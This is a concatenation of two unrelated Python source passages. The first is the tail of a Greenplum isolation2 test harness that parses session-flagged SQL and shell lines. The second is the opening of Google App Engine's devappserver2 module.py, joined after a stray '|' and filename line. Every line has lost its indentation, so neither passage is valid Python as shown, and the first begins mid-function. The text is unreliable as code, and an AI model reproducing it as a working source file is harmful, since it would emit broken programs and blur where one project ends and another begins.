self.pipe.send("#%s%s> %s" % (self.name, self.mode, str(self.create_exception)))
else:
r = self.execute_command(c)
self.pipe.send(r)
r = None
(c, wait) = self.pipe.recv()
def get_process(self, out_file, name, mode="", dbname="", user=None, passwd=None):
"""
Gets or creates the process by the given name
"""
if len(name) > 0 and not is_digit(name):
raise Exception("Name should be a number")
if len(name) > 0 and mode != "utility" and int(name) >= 1024:
raise Exception("Session name should be smaller than 1024 unless it is utility mode number")
if not (name, mode) in self.processes:
if not dbname:
dbname = self.dbname
self.processes[(name, mode)] = SQLIsolationExecutor.SQLConnection(out_file, name, mode, dbname, user, passwd)
return self.processes[(name, mode)]
def quit_process(self, out_file, name, mode="", dbname=""):
"""
Quits a process with the given name
"""
if len(name) > 0 and not is_digit(name):
raise Exception("Name should be a number")
if len(name) > 0 and mode != "utility" and int(name) >= 1024:
raise Exception("Session name should be smaller than 1024 unless it is utility mode number")
if not (name, mode) in self.processes:
raise Exception("Sessions not started cannot be quit")
self.processes[(name, mode)].quit()
del self.processes[(name, mode)]
def get_all_primary_contentids(self, dbname):
"""
Retrieves all primary content IDs (including the master). Intended for
use by *U queries.
"""
if not dbname:
dbname = self.dbname
con = pg.connect(dbname=dbname)
result = con.query("SELECT content FROM gp_segment_configuration WHERE role = 'p' order by content").getresult()
if len(result) == 0:
raise Exception("Invalid gp_segment_configuration contents")
return [int(content[0]) for content in result]
def __preprocess_sql(self, name, pre_run_cmd, sql, global_sh_executor):
if not pre_run_cmd:
return sql
(hostname, port) = ConnectionInfo.get_hostname_port(name, 'p')
# Inject the current hostname and port to the shell.
global_sh_executor.exec_global_shell("GP_HOSTNAME=%s" % hostname, True)
global_sh_executor.exec_global_shell("GP_PORT=%s" % port, True)
sqls = global_sh_executor.exec_global_shell_with_orig_str(sql, pre_run_cmd, True)
if (len(sqls) != 1):
raise Exception("Invalid shell command: %s" % "\n".join(sqls))
return sqls[0]
def __get_retrieve_user_token(self, name, global_sh_executor):
(hostname, port) = ConnectionInfo.get_hostname_port(name, 'p')
global_sh_executor.exec_global_shell("GP_HOSTNAME=%s" % hostname, True)
global_sh_executor.exec_global_shell("GP_PORT=%s" % port, True)
out = global_sh_executor.exec_global_shell("get_retrieve_token", True)
if (len(out) > 0):
token = out[0]
out = global_sh_executor.exec_global_shell("echo ${RETRIEVE_USER}", True)
if (len(out) > 0):
user = out[0]
return (user, token)
def process_command(self, command, output_file, global_sh_executor):
"""
Processes the given command.
The command at this point still includes the isolation behavior
flags, e.g. which session to use.
"""
process_name = ""
sql = command
flag = ""
con_mode = ""
dbname = ""
retrieve_token = None
retrieve_user = None
pre_run_cmd = None
post_run_cmd = None
m = self.command_pattern.match(command)
if m:
process_name = m.groups()[0]
flag = m.groups()[1]
if flag and flag[0] == "U":
con_mode = "utility"
elif flag and flag[0] == "S":
if len(flag) > 1:
flag = flag[1:]
con_mode = "standby"
elif flag and flag[0] == "R":
con_mode = "retrieve"
elif flag and flag[0] == "M":
con_mode = "mirror"
sql = m.groups()[2]
sql = sql.lstrip()
# If db_name is specifed , it should be of the following syntax:
# 1:@db_name <db_name>: <sql>
if sql.startswith('@db_name'):
sql_parts = sql.split(':', 2)
if not len(sql_parts) == 2:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
if not sql_parts[0].startswith('@db_name'):
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
if not len(sql_parts[0].split()) == 2:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
dbname = sql_parts[0].split()[1].strip()
if not dbname:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
sql = sql_parts[1]
else:
(found_hd, pre_run_cmd, ex_sql) = global_sh_executor.extract_sh_cmd('@pre_run', sql)
if found_hd:
sql = ex_sql
else:
(found_hd, post_run_cmd, ex_sql) = global_sh_executor.extract_sh_cmd('@post_run', sql)
if found_hd:
sql = ex_sql
if not flag:
if sql.startswith('!'):
sql = sql[1:]
# Check for execution mode. E.g.
# !\retcode path/to/executable --option1 --option2 ...
#
# At the moment, we only recognize the \retcode mode, which
# ignores all program output in the diff (it's still printed)
# and adds the return code.
mode = None
if sql.startswith('\\'):
mode, sql = sql.split(None, 1)
if mode != '\\retcode':
raise Exception('Invalid execution mode: {}'.format(mode))
cmd_output = subprocess.Popen(sql.strip(), stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
stdout, _ = cmd_output.communicate()
print(file=output_file)
if mode == '\\retcode':
print('-- start_ignore', file=output_file)
print(stdout.decode(), file=output_file)
if mode == '\\retcode':
print('-- end_ignore', file=output_file)
print('(exited with code {})'.format(cmd_output.returncode), file=output_file)
else:
sql_new = self.__preprocess_sql(process_name, pre_run_cmd, sql.strip(), global_sh_executor)
self.get_process(output_file, process_name, con_mode, dbname=dbname).query(sql_new, post_run_cmd, global_sh_executor)
elif flag == "&":
self.get_process(output_file, process_name, con_mode, dbname=dbname).fork(sql.strip(), True, global_sh_executor)
elif flag == ">":
self.get_process(output_file, process_name, con_mode, dbname=dbname).fork(sql.strip(), False, global_sh_executor)
elif flag == "<":
if len(sql) > 0:
raise Exception("No query should be given on join")
self.get_process(output_file, process_name, con_mode, dbname=dbname).join()
elif flag == "q":
if len(sql) > 0:
raise Exception("No query should be given on quit")
self.quit_process(output_file, process_name, con_mode, dbname=dbname)
elif flag == "U":
if process_name == '*':
process_names = [str(content) for content in self.get_all_primary_contentids(dbname)]
else:
process_names = [process_name]
for name in process_names:
sql_new = self.__preprocess_sql(name, pre_run_cmd, sql.strip(), global_sh_executor)
self.get_process(output_file, name, con_mode, dbname=dbname).query(sql_new, post_run_cmd, global_sh_executor)
elif flag == "U&":
sql_new = self.__preprocess_sql(process_name, pre_run_cmd, sql.strip(), global_sh_executor)
self.get_process(output_file, process_name, con_mode, dbname=dbname).fork(sql_new, True, global_sh_executor)
elif flag == "U<":
if len(sql) > 0:
raise Exception("No query should be given on join")
self.get_process(output_file, process_name, con_mode, dbname=dbname).join()
elif flag == "Uq":
if len(sql) > 0:
raise Exception("No query should be given on quit")
self.quit_process(output_file, process_name, con_mode, dbname=dbname)
elif flag == "S":
sql_new = self.__preprocess_sql(process_name, pre_run_cmd, sql.strip(), global_sh_executor)
self.get_process(output_file, process_name, con_mode, dbname=dbname).query(sql_new, post_run_cmd, global_sh_executor)
elif flag == "R":
if process_name == '*':
process_names = [str(content) for content in self.get_all_primary_contentids(dbname)]
else:
process_names = [process_name]
for name in process_names:
try:
sql_new = self.__preprocess_sql(name, pre_run_cmd, sql.strip(), global_sh_executor)
(retrieve_user, retrieve_token) = self.__get_retrieve_user_token(name, global_sh_executor)
self.get_process(output_file, name, con_mode, dbname=dbname, user=retrieve_user, passwd=retrieve_token).query(sql_new, post_run_cmd, global_sh_executor)
except SQLIsolationExecutor.SessionError as e:
print(str(e), file=output_file)
self.processes[(e.name, e.mode)].terminate()
del self.processes[(e.name, e.mode)]
elif flag == "R&":
sql_new = self.__preprocess_sql(process_name, pre_run_cmd, sql.strip(), global_sh_executor)
(retrieve_user, retrieve_token) = self.__get_retrieve_user_token(process_name, global_sh_executor)
self.get_process(output_file, process_name, con_mode, dbname=dbname, user=retrieve_user, passwd=retrieve_token).fork(sql_new, True, global_sh_executor)
elif flag == "R<":
if len(sql) > 0:
raise Exception("No query should be given on join")
(retrieve_user, retrieve_token) = self.__get_retrieve_user_token(process_name, global_sh_executor)
self.get_process(output_file, process_name, con_mode, dbname=dbname, user=retrieve_user, passwd=retrieve_token).join()
elif flag == "Rq":
if len(sql) > 0:
raise Exception("No query should be given on quit")
if process_name == '*':
process_names = [str(content) for content in self.get_all_primary_contentids(dbname)]
else:
process_names = [process_name]
for name in process_names:
try:
self.quit_process(output_file, name, con_mode, dbname=dbname)
except Exception as e:
print(str(e), file=output_file)
pass
elif flag == "M":
self.get_process(output_file, process_name, con_mode, dbname=dbname).query(sql.strip(), post_run_cmd, global_sh_executor)
else:
raise Exception("Invalid isolation flag")
def process_isolation_file(self, sql_file, output_file, initfile_prefix):
"""
Processes the given sql file and writes the output
to output file
"""
shell_executor = GlobalShellExecutor(output_file, initfile_prefix)
try:
command = ""
newline = False
for line in sql_file:
# this logic replicates the python2 behavior of a trailing comma at the end of print
# i.e. ''' print >>output_file, line.strip(), '''
print((" " if command and not newline else "") + line.strip(), end="", file=output_file)
newline = False
if line[0] == "!":
command_part = line # shell commands can use -- for multichar options like --include
elif re.match(r";.*--", line) or re.match(r"^--", line):
command_part = line.partition("--")[0] # remove comment from line
else:
command_part = line
if command_part == "" or command_part == "\n":
print(file=output_file)
newline = True
elif re.match(r".*;\s*$", command_part) or re.match(r"^\d+[q\\<]:\s*$", line) or re.match(r"^\*Rq:$", line) or re.match(r"^-?\d+[SUR][q\\<]:\s*$", line):
command += command_part
try:
self.process_command(command, output_file, shell_executor)
except GlobalShellExecutor.ExecutionError as e:
# error in the daemon shell cannot be recovered
raise
except Exception as e:
print("FAILED: ", e, file=output_file)
command = ""
else:
command += command_part
for process in list(self.processes.values()):
process.stop()
except:
for process in list(self.processes.values()):
process.terminate()
shell_executor.terminate()
raise
finally:
for process in list(self.processes.values()):
process.terminate()
shell_executor.terminate()
class SQLIsolationTestCase:
"""
The isolation test case allows a fine grained control of interleaved
executing transactions. This is mainly used to test isolation behavior.
[<#>[flag]:] <sql> | ! <shell scripts or command>
#: either an integer indicating a unique session, or a content-id if
followed by U (for utility-mode connections) or R (for retrieve-mode
connection). In 'U' mode or 'R' mode, the
content-id can alternatively be an asterisk '*' to perform a
utility-mode/retrieve-mode query on the master and all primary segments.
If you want to create multiple connections to the same content-id, just
increase N in: "content-id + {gpdb segment node number} * N",
e.g. if gpdb cluster segment number is 3, then:
(1) the master utility connections can be: -1U, -4U, -7U;
(2) the seg0 connections can be: 0U, 3U, 6U;
(3) the seg1 connections can be: 1U, 4U, 7U;
(4) the seg2 connections can be: 2U, 5U, 8U;
flag:
&: expect blocking behavior
>: running in background without blocking
<: join an existing session
q: quit the given session without blocking
U: connect in utility mode to primary contentid from gp_segment_configuration
U&: expect blocking behavior in utility mode (does not currently support an asterisk target)
U<: join an existing utility mode session (does not currently support an asterisk target)
R|R&|R<: similar to 'U' meaning execept that the connect is in retrieve mode, here don't
thinking about retrieve mode authentication, just using the normal authentication directly.
An example is:
Execute BEGIN in transaction 1
Execute BEGIN in transaction 2
Execute INSERT in transaction 2
Execute SELECT in transaction 1
Execute COMMIT in transaction 2
Execute SELECT in transaction 1
The isolation tests are specified identical to sql-scripts in normal
SQLTestCases. However, it is possible to prefix a SQL line with
an tranaction identifier followed by a colon (":").
The above example would be defined by
1: BEGIN;
2: BEGIN;
2: INSERT INTO a VALUES (1);
1: SELECT * FROM a;
2: COMMIT;
1: SELECT * FROM a;
Blocking behavior can be tested by forking and joining.
1: BEGIN;
2: BEGIN;
1: DELETE FROM foo WHERE a = 4;
2&: DELETE FROM foo WHERE a = 4;
1: COMMIT;
2<:
2: COMMIT;
2& forks the command. It is executed in the background. If the
command is NOT blocking at this point, it is considered an error.
2< joins the background command and outputs the result of the
command execution.
Session ids should be smaller than 1024.
2U: Executes a utility command connected to port 40000.
One difference to SQLTestCase is the output of INSERT.
SQLTestCase would output "INSERT 0 1" if one tuple is inserted.
SQLIsolationTestCase would output "INSERT 1". As the
SQLIsolationTestCase needs to have a more fine-grained control
over the execution order than possible with PSQL, it uses
the pygresql python library instead.
Connecting to a specific database:
1. If you specify a db_name metadata in the sql file, connect to that database in all open sessions.
2. If you want a specific session to be connected to a specific database , specify the sql as follows:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: <sql>
2: <sql>
etc
Here session 1 will be connected to testdb and session 2 will be connected to test2db. You can specify @db_name only at the beginning of the session. For eg:, following would error out:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: @db_name testdb: <sql>
2: <sql>
etc
Quitting sessions:
By default, all opened sessions will be stopped only at the end of the sql file execution. If you want to explicitly quit a session
in the middle of the test execution, you can specify a flag 'q' with the session identifier. For eg:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: <sql>
2: <sql>
1q:
2: <sql>
3: <sql>
2q:
3: <sql>
2: @db_name test: <sql>
1q: ---> Will quit the session established with testdb.
2q: ---> Will quit the session established with test2db.
The subsequent 2: @db_name test: <sql> will open a new session with the database test and execute the sql against that session.
Note: Do not expect blocking behavior from explicit quit statements.
This implies that a subsequent statement can execute while the relevant
session is still undergoing exit.
Shell Execution for SQL or Output:
@pre_run can be used for executing shell command to change input (i.e. each SQL statement) or get input info;
@post_run can be used for executing shell command to change ouput (i.e. the result set printed for each SQL execution)
or get output info. Just use the env variable ${RAW_STR} to refer to the input/out stream before shell execution,
and the output of the shell command will be used as the SQL exeucted or output printed into results file.
1: @post_run ' TOKEN1=` echo "${RAW_STR}" | awk \'NR==3\' | awk \'{print $1}\'` && export MATCHSUBS="${MATCHSUBS}${NL}m/${TOKEN1}/${NL}s/${TOKEN1}/token_id1/${NL}" && echo "${RAW_STR}" ': SELECT token,hostname,status FROM GP_ENDPOINTS WHERE cursorname='c1';
2R: @pre_run ' echo "${RAW_STR}" | sed "s#@TOKEN1#${TOKEN1}#" ': RETRIEVE ALL FROM "@TOKEN1";
These 2 sample is to:
- Sample 1: set env variable ${TOKEN1} to the cell (row 3, col 1) of the result set, and print the raw result.
The env var ${MATCHSUBS} is used to store the matchsubs section so that we can store it into initfile when
this test case file is finished executing.
- Sample 2: replaceing "@TOKEN1" by generated token which is fetch in sample1
There are some helper functions which will be sourced automatically to make above
cases easier. See global_sh_executor.sh for more information.
$RETRIEVE_USER is a special environment vars which will be read by python to use them
as the username for retrieve mode session. `None` will be used if the value has not
been set when start retrieve mode session. See the get_retrieve_token in global_sh_executor.sh
for more information about how to get the retrieve session password.
Catalog Modification:
Some tests are easier to write if it's possible to modify a system
catalog across the *entire* cluster. To perform a utility-mode query on
all segments and the master, you can use *U commands:
*U: SET allow_system_table_mods = true;
*U: UPDATE pg_catalog.<table> SET <column> = <value> WHERE <cond>;
Since the number of query results returned by a *U command depends on
the developer's cluster configuration, it can be useful to wrap them in
a start_/end_ignore block. (Unfortunately, this also hides legitimate
failures; a better long-term solution is needed.)
Block/join flags are not currently supported with *U.
Line continuation:
If a line is not ended by a semicolon ';' which is followed by 0 or more spaces, the line will be combined with next line and
sent together as a single statement.
e.g.: Send to the server separately:
1: SELECT * FROM t1; -> send "SELECT * FROM t1;"
SELECT * FROM t2; -> send "SELECT * FROM t2;"
e.g.: Send to the server once:
1: SELECT * FROM
t1; SELECT * FROM t2; -> "send SELECT * FROM t1; SELECT * FROM t2;"
ATTENTION:
Send multi SQL statements once:
Multi SQL statements can be sent at once, but there are some known issues. Generally only the last query result will be printed.
But due to the difficulties of dealing with semicolons insides quotes, we always echo the first SQL command instead of the last
one if query() returns None. This created some strange issues like:
CREATE TABLE t1 (a INT); INSERT INTO t1 SELECT generate_series(1,1000);
CREATE 1000 (Should be INSERT 1000, but here the CREATE is taken due to the limitation)
"""
def run_sql_file(self, sql_file, out_file = None, out_dir = None, optimizer = None):
"""
Given a sql file and an ans file, this adds the specified gucs (self.gucs) to the sql file , runs the sql
against the test case database (self.db_name) and verifies the output with the ans file.
If an 'init_file' exists in the same location as the sql_file, this will be used
while doing gpdiff.
"""
# Add gucs to the test sql and form the actual sql file to be run
if not out_dir:
out_dir = self.get_out_dir()
if not os.path.exists(out_dir):
TINCSystem.make_dirs(out_dir, ignore_exists_error = True)
if optimizer is None:
gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file))
else:
# sql file will be <basename>_opt.sql or <basename>_planner.sql based on optimizer
gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file).replace('.sql', '_%s.sql' %self._optimizer_suffix(optimizer)))
self._add_gucs_to_sql_file(sql_file, gucs_sql_file, optimizer)
self.test_artifacts.append(gucs_sql_file)
if not out_file:
if optimizer is None:
out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '.out'))
else:
# out file will be *_opt.out or *_planner.out based on optimizer
out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '_%s.out' %self._optimizer_suffix(optimizer)))
self.test_artifacts.append(out_file)
executor = SQLIsolationExecutor(dbname=self.db_name)
with open(out_file, "w") as f:
executor.process_isolation_file(open(sql_file), f, out_file)
f.flush()
if out_file[-2:] == '.t':
out_file = out_file[:-2]
return out_file
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("--dbname", dest="dbname",
help="connect to database DBNAME", metavar="DBNAME")
parser.add_option("--initfile_prefix", dest="initfile_prefix",
help="The file path prefix for automatically generated initfile", metavar="INITFILE_PREFIX")
(options, args) = parser.parse_args()
# Explicitly set multiprocessing start method to 'fork' (Unix
# default) to make isolation2 work with python3.8+ on MacOS.
if sys.version_info >= (3, 8) and sys.platform == "darwin":
multiprocessing.set_start_method('fork')
executor = SQLIsolationExecutor(dbname=options.dbname)
executor.process_isolation_file(sys.stdin, sys.stdout, options.initfile_prefix)
|
module.py
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Manage the lifecycle of runtime processes and dispatch requests to them."""
import collections
import cStringIO
import functools
import httplib
import logging
import math
import os
import os.path
import random
import re
import string
import threading
import time
import urllib
import urlparse
import wsgiref.headers
from google.appengine.api import api_base_pb
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import appinfo
from google.appengine.api import request_info
from google.appengine.api.logservice import log_service_pb
from google.appengine.tools.devappserver2 import application_configuration
from google.appengine.tools.devappserver2 import blob_image
from google.appengine.tools.devappserver2 import blob_upload
from google.appengine.tools.devappserver2 import channel
from google.appengine.tools.devappserver2 import constants
from google.appengine.tools.devappserver2 import endpoints
from google.appengine.tools.devappserver2 import errors
from google.appengine.tools.devappserver2 import file_watcher
from google.appengine.tools.devappserver2 import go_runtime
from google.appengine.tools.devappserver2 import http_runtime_constants
from google.appengine.tools.devappserver2 import instance
from google.appengine.tools.devappserver2 import login
from google.appengine.tools.devappserver2 import php_runtime
from google.appengine.tools.devappserver2 import python_runtime
from google.appengine.tools.devappserver2 import request_rewriter
from google.appengine.tools.devappserver2 import runtime_config_pb2
from google.appengine.tools.devappserver2 import start_response_utils
from google.appengine.tools.devappserver2 import static_files_handler
from google.appengine.tools.devappserver2 import thread_executor
from google.appengine.tools.devappserver2 import url_handler
from google.appengine.tools.devappserver2 import util
from google.appengine.tools.devappserver2 import wsgi_handler
from google.appengine.tools.devappserver2 import wsgi_server
_LOWER_HEX_DIGITS = string.hexdigits.lower()
_UPPER_HEX_DIGITS = string.hexdigits.upper()
_REQUEST_ID_HASH_LENGTH = 8
_THREAD_POOL = thread_executor.ThreadExecutor()
_RESTART_INSTANCES_CONFIG_CHANGES = frozenset(
[application_configuration.NORMALIZED_LIBRARIES_CHANGED,
application_configuration.SKIP_FILES_CHANGED,
application_configuration.NOBUILD_FILES_CHANGED,
# The server must be restarted when the handlers change because files
# appearing in static content handlers make them unavailable to the
# runtime.
application_configuration.HANDLERS_CHANGED,
application_configuration.ENV_VARIABLES_CHANGED])
_REQUEST_LOGGING_BLACKLIST_RE = re.compile(
r'^/_ah/(?:channel/(?:dev|jsapi)|img|login|upload)')
# Fake arguments for _handle_script_request for request types that don't use
# user-specified handlers.
_EMPTY_MATCH = re.match('', '')
_DUMMY_URLMAP = appinfo.URLMap(script='/')
_SHUTDOWN_TIMEOUT = 30
def _static_files_regex_from_handlers(handlers):
patterns = []
for url_map in handlers:
handler_type = url_map.GetHandlerType()
if url_map.application_readable:
continue
if handler_type == appinfo.STATIC_FILES:
patterns.append(r'(%s)' % url_map.upload)
elif handler_type == appinfo.STATIC_DIR:
patterns.append('(%s%s%s)' % (url_map.static_dir.rstrip(os.path.sep),
re.escape(os.path.sep), r'.*'))
return r'^%s$' % '|'.join(patterns)
class InteractiveCommandError(errors.Error):
pass
class _ScriptHandler(url_handler.UserConfiguredURLHandler):
"""A URL handler that will cause the request to be dispatched to an instance.
This handler is special in that it does not have a working handle() method
since the Module's dispatch logic is used to select the appropriate Instance.
"""
def __init__(self, url_map):
"""Initializer for _ScriptHandler.
Args:
url_map: An appinfo.URLMap instance containing the configuration for this
handler.
"""
try:
url_pattern = re.compile('%s$' % url_map.url)
except re.error, e:
raise errors.InvalidAppConfigError(
'invalid url %r in script handler: %s' % (url_map.url, e))
super(_ScriptHandler, self).__init__(url_map, url_pattern)
self.url_map = url_map
def handle(self, match, environ, start_response):
"""This is a dummy method that should never be called."""
raise NotImplementedError()
class Module(object):
"""The abstract base for all instance pool implementations."""
_RUNTIME_INSTANCE_FACTORIES = {
'go': go_runtime.GoRuntimeInstanceFactory,
'php': php_runtime.PHPRuntimeInstanceFactory,
'python': python_runtime.PythonRuntimeInstanceFactory,
'python27': python_runtime.PythonRuntimeInstanceFactory,
}
def _create_instance_factory(self,
module_configuration):
"""Create an instance.InstanceFactory.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
Returns:
A instance.InstanceFactory subclass that can be used to create instances
with the provided configuration.
Raises:
RuntimeError: if the configuration specifies an unknown runtime.
"""
# TODO: a bad runtime should be caught before we get here.
if module_configuration.runtime not in self._RUNTIME_INSTANCE_FACTORIES:
raise RuntimeError(
'Unknown runtime %r; supported runtimes are %s.' %
(module_configuration.runtime,
', '.join(
sorted(repr(k) for k in self._RUNTIME_INSTANCE_FACTORIES))))
instance_factory = self._RUNTIME_INSTANCE_FACTORIES[
module_configuration.runtime]
return instance_factory(
request_data=self._request_data,
runtime_config_getter=self._get_runtime_config,
module_configuration=module_configuration)
def _create_url_handlers(self):
"""Constructs URLHandlers based on the module configuration.
Returns:
A list of url_handler.URLHandlers corresponding that can react as
described in the given configuration.
"""
handlers = []
# Add special URL handlers (taking precedence over user-defined handlers)
url_pattern = '/%s$' % login.LOGIN_URL_RELATIVE
handlers.append(wsgi_handler.WSGIHandler(login.application,
url_pattern))
url_pattern = '/%s' % blob_upload.UPLOAD_URL_PATH
# The blobstore upload handler forwards successful requests back to self
handlers.append(
wsgi_handler.WSGIHandler(blob_upload.Application(self), url_pattern))
url_pattern = '/%s' % blob_image.BLOBIMAGE_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(blob_image.Application(), url_pattern))
url_pattern = '/%s' % channel.CHANNEL_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(channel.application, url_pattern))
# Add a handler for Endpoints, only if version == 1.0
runtime_config = self._get_runtime_config()
for library in runtime_config.libraries:
if library.name == 'endpoints' and library.version == '1.0':
url_pattern = '/%s' % endpoints.API_SERVING_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(
endpoints.EndpointsDispatcher(self._dispatcher), url_pattern))
found_start_handler = False
found_warmup_handler = False
# Add user-defined URL handlers
for url_map in self._module_configuration.handlers:
handler_type = url_map.GetHandlerType()
if handler_type == appinfo.HANDLER_SCRIPT:
handlers.append(_ScriptHandler(url_map))
if not found_start_handler and re.match('%s$' % url_map.url,
'/_ah/start'):
found_start_handler = True
if not found_warmup_handler and re.match('%s$' % url_map.url,
'/_ah/warmup'):
found_warmup_handler = True
elif handler_type == appinfo.STATIC_FILES:
handlers.append(
static_files_handler.StaticFilesHandler(
self._module_configuration.application_root,
url_map))
elif handler_type == appinfo.STATIC_DIR:
handlers.append(
static_files_handler.StaticDirHandler(
self._module_configuration.application_root,
url_map))
else:
assert 0, 'unexpected handler %r for %r' % (handler_type, url_map)
# Add a handler for /_ah/start if no script handler matches.
if not found_start_handler:
handlers.insert(0, _ScriptHandler(self._instance_factory.START_URL_MAP))
# Add a handler for /_ah/warmup if no script handler matches and warmup is
# enabled.
if (not found_warmup_handler and
'warmup' in (self._module_configuration.inbound_services or [])):
handlers.insert(0, _ScriptHandler(self._instance_factory.WARMUP_URL_MAP))
return handlers
def _get_runtime_config(self):
"""Returns the configuration for the runtime.
Returns:
A runtime_config_pb2.Config instance representing the configuration to be
passed to an instance. NOTE: This does *not* include the instance_id
field, which must be populated elsewhere.
"""
runtime_config = runtime_config_pb2.Config()
runtime_config.app_id = self._module_configuration.application
runtime_config.version_id = self._module_configuration.version_id
if self._threadsafe_override is None:
runtime_config.threadsafe = self._module_configuration.threadsafe or False
else:
runtime_config.threadsafe = self._threadsafe_override
runtime_config.application_root = (
self._module_configuration.application_root)
if not self._allow_skipped_files:
runtime_config.skip_files = str(self._module_configuration.skip_files)
runtime_config.static_files = _static_files_regex_from_handlers(
self._module_configuration.handlers)
runtime_config.api_port = self._api_port
runtime_config.stderr_log_level = self._runtime_stderr_loglevel
runtime_config.datacenter = 'us1'
runtime_config.auth_domain = self._auth_domain
for library in self._module_configuration.normalized_libraries:
runtime_config.libraries.add(name=library.name, version=library.version)
for key, value in (self._module_configuration.env_variables or {}).items():
runtime_config.environ.add(key=str(key), value=str(value))
if self._cloud_sql_config:
runtime_config.cloud_sql_config.CopyFrom(self._cloud_sql_config)
if self._module_configuration.runtime == 'php':
if self._php_executable_path:
runtime_config.php_config.php_executable_path = (
self._php_executable_path)
runtime_config.php_config.enable_debugger = (
self._enable_php_remote_debugging)
if (self._python_config and
self._module_configuration.runtime.startswith('python')):
runtime_config.python_config.CopyFrom(self._python_config)
return runtime_config
def _maybe_restart_instances(self, config_changed, file_changed):
"""Restarts instances. May avoid some restarts depending on policy.
One of config_changed or file_changed must be True.
Args:
config_changed: True if the configuration for the application has changed.
file_changed: True if any file relevant to the application has changed.
"""
if not config_changed and not file_changed:
return
logging.debug('Restarting instances.')
policy = self._instance_factory.FILE_CHANGE_INSTANCE_RESTART_POLICY
assert policy is not None, 'FILE_CHANGE_INSTANCE_RESTART_POLICY not set'
with self._condition:
instances_to_quit = set()
for inst in self._instances:
if (config_changed or
(policy == instance.ALWAYS) or
(policy == instance.AFTER_FIRST_REQUEST and inst.total_requests)):
instances_to_quit.add(inst)
self._instances -= instances_to_quit
for inst in instances_to_quit:
inst.quit(allow_async=True)
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
self._maybe_restart_instances(
config_changed=bool(config_changes & _RESTART_INSTANCES_CONFIG_CHANGES),
file_changed=has_file_changes)
def __init__(self,
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for Module.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_port: The port that APIModule listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
self._module_configuration = module_configuration
self._name = module_configuration.module_name
self._host = host
self._api_port = api_port
self._auth_domain = auth_domain
self._runtime_stderr_loglevel = runtime_stderr_loglevel
self._balanced_port = balanced_port
self._php_executable_path = php_executable_path
self._enable_php_remote_debugging = enable_php_remote_debugging
self._python_config = python_config
self._cloud_sql_config = cloud_sql_config
self._request_data = request_data
self._allow_skipped_files = allow_skipped_files
self._threadsafe_override = threadsafe_override
self._dispatcher = dispatcher
self._max_instances = max_instances
self._automatic_restarts = automatic_restarts
self._use_mtime_file_watcher = use_mtime_file_watcher
self._default_version_port = default_version_port
self._port_registry = port_registry
self._instance_factory = self._create_instance_factory(
self._module_configuration)
if self._automatic_restarts:
self._watcher = file_watcher.get_file_watcher(
[self._module_configuration.application_root] +
self._instance_factory.get_restart_directories(),
self._use_mtime_file_watcher)
else:
self._watcher = None
self._handler_lock = threading.Lock()
self._handlers = self._create_url_handlers()
